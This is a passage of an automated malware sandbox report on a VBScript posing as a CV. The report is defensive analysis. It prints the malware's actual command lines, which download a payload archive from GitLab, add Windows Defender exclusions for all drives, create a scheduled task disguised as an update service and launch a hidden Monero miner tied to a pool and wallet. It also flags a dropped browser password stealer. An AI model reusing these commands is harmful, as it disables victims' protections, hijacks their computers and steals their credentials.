Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4

Queries sensitive share information (via WMI, Win32_Share, often done to detect virtual machines)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5028	Thread sleep count: 9721 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\Public\WindowsUpdate\mservice.exe TID: 6416	Thread sleep time: -199780s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9721
Source: C:\Users\Public\WindowsUpdate\mservice.exe	Window / User API: threadDelayed 9989

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\Public\7g.exe	Dropped PE file which has not been started: C:\Users\Public\WindowsUpdate\WinRing0x64.sys	Jump to dropped file
Source: C:\Users\Public\7g.exe	Dropped PE file which has not been started: C:\Users\Public\WindowsUpdate\ps.exe	Jump to dropped file
Source: C:\Users\Public\7g.exe	Dropped PE file which has not been started: C:\Users\Public\WindowsUpdate\go.exe	Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\7g.exe

Code function: 11_2_003B716C __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\

Source: wscript.exe, 00000018.00000003.897773136.000001DBC74D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: wscript.exe, 00000005.00000003.811414806.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858655277.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860747465.00000221630D3000.00000004.00000020.00020000.00000000.sdmp, mservice.exe, 00000013.00000002.992637368.0000018540531000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\Public\7g.exe

Code function: 11_2_003B6553 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,

Source: C:\Users\Public\7g.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 49.12.202.237 443
Source: C:\Windows\System32\wscript.exe	Domain query: www.7-zip.org
Source: C:\Windows\System32\wscript.exe	Domain query: gitlab.com
Source: C:\Windows\System32\wscript.exe	Network Connect: 172.65.251.78 443

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: 7zr[1].exe.5.dr

Jump to dropped file

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\WindowsUpdate\mservice.exe "c:\users\public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pnzm7cvxc77nhzvzhreafavbjx4gvxyvea8hkhuxhuzhqfdxwfjmcczz959w8kelv8ffgk6dkexqq9uhaxaucj5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\WindowsUpdate\mservice.exe "c:\users\public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pnzm7cvxc77nhzvzhreafavbjx4gvxyvea8hkhuxhuzhqfdxwfjmcczz959w8kelv8ffgk6dkexqq9uhaxaucj5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo

Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\Public\7g.exe

Code function: 11_2_003BA4D0 GetSystemTimeAsFileTime,

Source: C:\Users\Public\7g.exe

Code function: 11_2_0041D2A0 GetVersion,GetModuleHandleW,GetProcAddress,

Stealing of Sensitive Information

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 11.3.7g.exe.35b7600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\WindowsUpdate\ps.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	311 Windows Management Instrumentation	1 Windows Service	1 Access Token Manipulation	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	621 Scripting	1 Scheduled Task/Job	1 Windows Service	1 Deobfuscate/Decode Files or Information	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Native API	1 Registry Run Keys / Startup Folder	112 Process Injection	621 Scripting	Security Account Manager	26 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Exploitation for Client Execution	Logon Script (Mac)	1 Scheduled Task/Job	31 Obfuscated Files or Information	NTDS	511 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Command and Scripting Interpreter	Network Logon Script	1 Registry Run Keys / Startup Folder	11 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 Scheduled Task/Job	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	231 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	1 PowerShell	Startup Items	Startup Items	111 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	231 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Access Token Manipulation	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	112 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
curriculum_vitae-copie.vbs	3%	ReversingLabs	Script-WScript.Packed.Generic
curriculum_vitae-copie.vbs	10%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\WindowsUpdate\mservice.exe	100%	Avira	HEUR/AGEN.1311290
C:\Users\Public\WindowsUpdate\ps.exe	100%	Joe Sandbox ML
C:\Users\Public\WindowsUpdate\mservice.exe	100%	Joe Sandbox ML
C:\Users\Public\7g.exe	0%	ReversingLabs
C:\Users\Public\WindowsUpdate\WinRing0x64.sys	5%	ReversingLabs
C:\Users\Public\WindowsUpdate\go.exe	16%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\WindowsUpdate\mservice.exe	83%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\Users\Public\WindowsUpdate\ps.exe	81%	ReversingLabs	Win32.Hacktool.PasswordRevealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\7zr[1].exe	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://xmrig.com/wizard%s	0%	URL Reputation	safe
https://xmrig.com/wizard	0%	URL Reputation	safe
https://xmrig.com/docs/algorithms	0%	URL Reputation	safe
https://xmrig.com/docs/algorithms	0%	URL Reputation	safe
https://www.recaptcha.net/	0%	URL Reputation	safe
https://snowplow.tgitlab.c%	0%	Avira URL Cloud	safe
https://snowplow.tgitlab.c%%.	0%	Avira URL Cloud	safe
https://sentry.gitlab.net/api/105/security/?sentry_key=a42ea3adc19140d9a6424906e12fba86;	0%	Avira URL Cloud	safe
https://sentry.gitlab.net	0%	Avira URL Cloud	safe
https://new-sentry.gitlab.net	0%	Avira URL Cloud	safe
https://snowplow.trx.gitlab.net	0%	Avira URL Cloud	safe
https://snowplow.trx.gitlab.net	0%	Virustotal		Browse
https://new-sentry.gitlab.net	0%	Virustotal		Browse
https://sentry.gitlab.net/api/105/security/?sentry_key=a42ea3adc19140d9a6424906e12fba86;	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.7-zip.org	49.12.202.237	true	false		high
gitlab.com	172.65.251.78	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=false	false		high
https://www.7-zip.org/a/7zr.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.7-zip.org/w	wscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falsee	wscript.exe, 00000017.00000002.881382988.000001E320C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899241012.000001FFE0BB5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falseA	wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp	false		high
https://xmrig.com/wizard%s	7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	false	URL Reputation: safe	unknown
https://new-sentry.gitlab.net	wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://snowplow.trx.gitlab.net	wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sentry.gitlab.net/api/105/security/?sentry_key=a42ea3adc19140d9a6424906e12fba86;	wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	false	URL Reputation: safe	unknown
https://gitlab.com/	wscript.exe, 00000005.00000003.811414806.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858655277.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216311D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.7-zip.org/O	wscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://snowplow.tgitlab.c%	wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://gitlab.com	wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/cwIf	wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false	wscript.exe, 00000019.00000002.899281249.000001FFE25D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899123544.000001FFE0938000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899241012.000001FFE0BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898695255.000001FFE094D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898409186.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899199737.000001FFE094E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp, sarmat.vbs.11.dr	false		high
https://www.7-zip.org/a/7zr.exel	wscript.exe, 00000005.00000003.858386999.0000022162F60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860549226.0000022162F61000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.856009779.0000022162F60000.00000004.00000020.00020000.00000000.sdmp	false		high
